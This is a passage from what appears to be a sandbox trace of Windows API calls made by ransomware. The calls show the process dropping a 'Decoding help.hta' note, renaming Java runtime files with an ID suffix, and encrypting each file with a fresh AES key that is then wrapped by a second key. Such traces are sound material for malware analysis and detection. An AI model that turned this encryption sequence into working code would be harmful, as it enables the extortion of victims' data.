(x86)\\Java\\jre7\\bin\\axbridge.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0055.278] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\axbridge.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\axbridge.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\axbridge.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\axbridge.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0056.434] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\axbridge.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\axbridge.dll.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x704 [0056.434] CreateFileMappingA (hFile=0x704, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x8cc [0056.434] CryptAcquireContextA (in: phProv=0x2f8fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x2f8fcec*=0x3449bd8) returned 1 [0059.869] CryptGenKey (in: hProv=0x3449bd8, Algid=0x6610, dwFlags=0x1, phKey=0x2f8fce8 | out: phKey=0x2f8fce8*=0x5da7f8) returned 1 [0059.869] CryptExportKey (in: hKey=0x5da7f8, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x2f8fbe4, pdwDataLen=0x2f8fce4 | out: pbData=0x2f8fbe4*, pdwDataLen=0x2f8fce4*=0x2c) returned 1 [0059.869] MapViewOfFile (hFileMappingObject=0x8cc, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x255a0) returned 0x3a60000 [0059.881] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f8fbe4*, pdwDataLen=0x2f8fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x2f8fbe4*, pdwDataLen=0x2f8fcf8*=0x100) returned 1 [0059.882] CryptEncrypt (in: hKey=0x5da7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3a60000, pdwDataLen=0x2f8fce4*=0x255a0, dwBufLen=0x255a0 | out: pbData=0x3a60000*, pdwDataLen=0x2f8fce4*=0x255a0) returned 1 [0059.936] UnmapViewOfFile (lpBaseAddress=0x3a60000) returned 1 [0059.940] CloseHandle (hObject=0x8cc) returned 1 [0059.940] CryptDestroyKey (hKey=0x5da7f8) returned 1 [0059.940] CryptReleaseContext (hProv=0x3449bd8, dwFlags=0x0) returned 1 [0059.940] SetFilePointerEx (in: hFile=0x704, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.940] WriteFile (in: hFile=0x704, lpBuffer=0x2f8fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f8fcf8, lpOverlapped=0x0 | out: lpBuffer=0x2f8fbe4*, lpNumberOfBytesWritten=0x2f8fcf8*=0x100, lpOverlapped=0x0) returned 1 [0061.356] WriteFile (in: hFile=0x704, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x2f8fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x2f8fcf8*=0x500, lpOverlapped=0x0) returned 1 [0061.356] CloseHandle (hObject=0x704) returned 1 [0061.356] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\axbridge.dll.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0061.356] FindNextFileW (in: hFindFile=0x6715b0, lpFindFileData=0x2f8fd30 | out: lpFindFileData=0x2f8fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x743b2580, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x76eb12e0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x76eb12e0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="client", cAlternateFileName="")) returned 1 [0061.356] lstrcmpW (lpString1=".", lpString2="client") returned -1 [0061.356] lstrcmpW (lpString1="..", lpString2="client") returned -1 [0061.356] lstrcmpiW (lpString1="windows", lpString2="client") returned 1 [0061.356] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\*.*" [0061.356] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\*.*") returned 44 [0061.356] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\", lpString2="client" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\client") returned="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\client" [0061.356] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\client", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\client\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\client\\*.*" [0061.357] GlobalMemoryStatus (in: lpBuffer=0x2f8fd10 | out: lpBuffer=0x2f8fd10) [0063.796] CreateThread (lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x93280b0, dwCreationFlags=0x0, lpThreadId=0x0) Thread: id = 316 os_tid = 0x794 [0042.511] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\*.*", lpFindFileData=0x3bcfd30 | out: lpFindFileData=0x3bcfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7444ab00, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x7572f9a0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x7572f9a0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x671630 [0042.517] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0042.517] FindNextFileW (in: hFindFile=0x671630, lpFindFileData=0x3bcfd30 | out: lpFindFileData=0x3bcfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7444ab00, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x7572f9a0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x7572f9a0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.519] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0042.519] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0042.519] FindNextFileW (in: hFindFile=0x671630, lpFindFileData=0x3bcfd30 | out: lpFindFileData=0x3bcfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7444ab00, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x7444ab00, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x7444ab00, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x9b, dwReserved0=0x0, dwReserved1=0x0, cFileName="accessibility.properties", cAlternateFileName="ACCESS~1.PRO")) returned 1 [0042.704] lstrcpyW (in: lpString1=0x11173c18, lpString2="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\*.*" [0042.704] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\*.*") returned 44 [0042.704] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\Decoding help.hta" [0042.704] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\Decoding help.hta" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\decoding help.hta")) returned 0xffffffff [0042.704] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\Decoding help.hta" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x688 [0042.704] WriteFile (in: hFile=0x688, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x3bcfcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x3bcfcf8*=0x78e, lpOverlapped=0x0) returned 1 [0042.705] CloseHandle (hObject=0x688) returned 1 [0042.705] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0042.706] lstrcmpiW (lpString1="Decoding help.hta", lpString2="accessibility.properties") returned 1 [0042.706] lstrlenW (lpString="accessibility.properties") returned 24 [0042.706] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\*.*" [0042.706] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\*.*") returned 44 [0042.706] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\", lpString2="accessibility.properties" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\accessibility.properties") returned="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\accessibility.properties" [0042.706] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\accessibility.properties" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\accessibility.properties") returned="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\accessibility.properties" [0042.706] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\accessibility.properties", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\accessibility.properties.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\accessibility.properties.[ID]g9uZrLhJaygpwRm1[ID]" [0042.706] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\accessibility.properties" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\accessibility.properties"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\accessibility.properties.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\accessibility.properties.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0042.706] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\accessibility.properties.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\accessibility.properties.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x688 [0042.707] CreateFileMappingA (hFile=0x688, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x668 [0042.707] CryptAcquireContextA (in: phProv=0x3bcfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3bcfcec*=0x3449e80) returned 1 [0046.577] CryptGenKey (in: hProv=0x3449e80, Algid=0x6610, dwFlags=0x1, phKey=0x3bcfce8 | out: phKey=0x3bcfce8*=0x6716b0) returned 1 [0046.577] CryptExportKey (in: hKey=0x6716b0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x3bcfbe4, pdwDataLen=0x3bcfce4 | out: pbData=0x3bcfbe4*, pdwDataLen=0x3bcfce4*=0x2c) returned 1 [0046.577] MapViewOfFile (hFileMappingObject=0x668, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x80) returned 0x530000 [0046.579] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3bcfbe4*, pdwDataLen=0x3bcfcf8*=0x40, dwBufLen=0x100 | out: pbData=0x3bcfbe4*, pdwDataLen=0x3bcfcf8*=0x100) returned 1 [0046.579] CryptEncrypt (in: hKey=0x6716b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x530000*, pdwDataLen=0x3bcfce4*=0x80, dwBufLen=0x80 | out: pbData=0x530000*, pdwDataLen=0x3bcfce4*=0x80) returned 1 [0046.579] UnmapViewOfFile (lpBaseAddress=0x530000) returned 1 [0046.580] CloseHandle (hObject=0x668) returned 1 [0046.580] CryptDestroyKey (hKey=0x6716b0) returned 1 [0046.581] CryptReleaseContext (hProv=0x3449e80, dwFlags=0x0) returned 1 [0046.581] SetFilePointerEx (in: hFile=0x688, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0046.581] WriteFile (in: hFile=0x688, lpBuffer=0x3bcfbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3bcfcf8, lpOverlapped=0x0 | out: lpBuffer=0x3bcfbe4*, lpNumberOfBytesWritten=0x3bcfcf8*=0x100, lpOverlapped=0x0) returned 1 [0046.581] WriteFile (in: hFile=0x688, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x3bcfcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x3bcfcf8*=0x500, lpOverlapped=0x0) returned 1 [0046.582] CloseHandle (hObject=0x688) returned 1 [0046.583] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\accessibility.properties.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0046.583] FindNextFileW (in: hFindFile=0x671630, lpFindFileData=0x3bcfd30 | out: lpFindFileData=0x3bcfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7444ab00, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x7444ab00, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x7444ab00, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x2a2dd, dwReserved0=0x0, dwReserved1=0x0, cFileName="alt-rt.jar", cAlternateFileName="")) returned 1 [0046.583] lstrcpyW (in: lpString1=0x10970868, lpString2="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\*.*" [0046.583] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\*.*") returned 44 [0046.583] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\Decoding help.hta" [0046.583] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\Decoding help.hta" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\decoding help.hta")) returned 0x1 [0046.583] lstrcmpiW (lpString1="Decoding help.hta", lpString2="alt-rt.jar") returned 1 [0046.583] lstrlenW (lpString="alt-rt.jar") returned 10 [0046.583] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\*.*" [0046.583] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\*.*") returned 44 [0046.583] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\", lpString2="alt-rt.jar" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\alt-rt.jar") returned="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\alt-rt.jar" [0046.583] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\alt-rt.jar" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\alt-rt.jar") returned="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\alt-rt.jar" [0046.583] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\alt-rt.jar", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\alt-rt.jar.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\alt-rt.jar.[ID]g9uZrLhJaygpwRm1[ID]" [0046.583] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\alt-rt.jar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\alt-rt.jar"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\alt-rt.jar.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\alt-rt.jar.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0046.584] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\alt-rt.jar.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\alt-rt.jar.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x688 [0046.584] CreateFileMappingA (hFile=0x688, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x668 [0046.584] CryptAcquireContextA (in: phProv=0x3bcfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3bcfcec*=0x3449e80) returned 1 [0046.585] CryptGenKey (in: hProv=0x3449e80, Algid=0x6610, dwFlags=0x1, phKey=0x3bcfce8 | out: phKey=0x3bcfce8*=0x5db9b8) returned 1 [0046.585] CryptExportKey (in: hKey=0x5db9b8, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x3bcfbe4, pdwDataLen=0x3bcfce4 | out: pbData=0x3bcfbe4*, pdwDataLen=0x3bcfce4*=0x2c) returned 1 [0046.585] MapViewOfFile (hFileMappingObject=0x668, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2a2c0) returned 0x550000 [0046.656] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3bcfbe4*, pdwDataLen=0x3bcfcf8*=0x40, dwBufLen=0x100 | out: pbData=0x3bcfbe4*, pdwDataLen=0x3bcfcf8*=0x100) returned 1 [0046.656] CryptEncrypt (in: hKey=0x5db9b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x550000, pdwDataLen=0x3bcfce4*=0x2a2c0, dwBufLen=0x2a2c0 | out: pbData=0x550000*, pdwDataLen=0x3bcfce4*=0x2a2c0) returned 1 [0047.024] UnmapViewOfFile (lpBaseAddress=0x550000) returned 1 [0047.027] CloseHandle (hObject=0x668) returned 1 [0047.027] CryptDestroyKey (hKey=0x5db9b8) returned 1 [0047.027] CryptReleaseContext (hProv=0x3449e80, dwFlags=0x0) returned 1 [0047.027] SetFilePointerEx (in: hFile=0x688, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0047.027] WriteFile (in: hFile=0x688, lpBuffer=0x3bcfbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3bcfcf8, lpOverlapped=0x0 | out: lpBuffer=0x3bcfbe4*, lpNumberOfBytesWritten=0x3bcfcf8*=0x100, lpOverlapped=0x0) returned 1 [0050.365] WriteFile (in: hFile=0x688, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x3bcfcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x3bcfcf8*=0x500, lpOverlapped=0x0) returned 1 [0050.365] CloseHandle (hObject=0x688) returned 1 [0051.372] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\alt-rt.jar.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0055.270] FindNextFileW (in: hFindFile=0x671630, lpFindFileData=0x3bcfd30 | out: lpFindFileData=0x3bcfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7444ab00, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x7444ab00, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x7444ab00, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="applet", cAlternateFileName="")) returned 1 [0055.270] lstrcmpW (lpString1=".", lpString2="applet") returned -1 [0055.270] lstrcmpW (lpString1="..", lpString2="applet") returned -1 [0055.270] lstrcmpiW (lpString1="windows", lpString2="applet") returned 1 [0055.270] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\*.*" [0055.270] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\*.*") returned 44 [0055.270] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\", lpString2="applet" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\applet") returned="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\applet" [0055.270] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\applet", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\applet\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\applet\\*.*" [0055.270] GlobalMemoryStatus (in: lpBuffer=0x3bcfd10 | out: lpBuffer=0x3bcfd10) [0055.691] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x2a6a8050, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x820 [0055.753] CloseHandle (hObject=0x820) returned 1 [0055.753] FindNextFileW (in: hFindFile=0x671630, lpFindFileData=0x3bcfd30 | out: lpFindFileData=0x3bcfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7444ab00, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x7444ab00, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x7444ab00, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x4d0, dwReserved0=0x0, dwReserved1=0x0, cFileName="calendars.properties", cAlternateFileName="CALEND~1.PRO")) returned 1 [0055.753] lstrcpyW (in: lpString1=0x2a9189a0, lpString2="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\*.*" [0055.754] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\*.*") returned 44 [0055.754] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\Decoding help.hta" [0055.754] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\Decoding help.hta" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\decoding help.hta")) returned 0x1 [0055.754] lstrcmpiW (lpString1="Decoding help.hta", lpString2="calendars.properties") returned 1 [0055.754] lstrlenW (lpString="calendars.properties") returned 20 [0055.754] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\*.*" [0055.754] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\*.*") returned 44 [0055.754] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\", lpString2="calendars.properties" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\calendars.properties") returned="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\calendars.properties" [0055.754] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\calendars.properties" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\calendars.properties") returned="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\calendars.properties" [0055.754] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\calendars.properties", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\calendars.properties.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\calendars.properties.[ID]g9uZrLhJaygpwRm1[ID]" [0055.754] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\calendars.properties" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\calendars.properties"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\calendars.properties.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\calendars.properties.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0056.272] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\calendars.properties.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\calendars.properties.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x898 [0056.272] CreateFileMappingA (hFile=0x898, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x89c [0056.272] CryptAcquireContextA 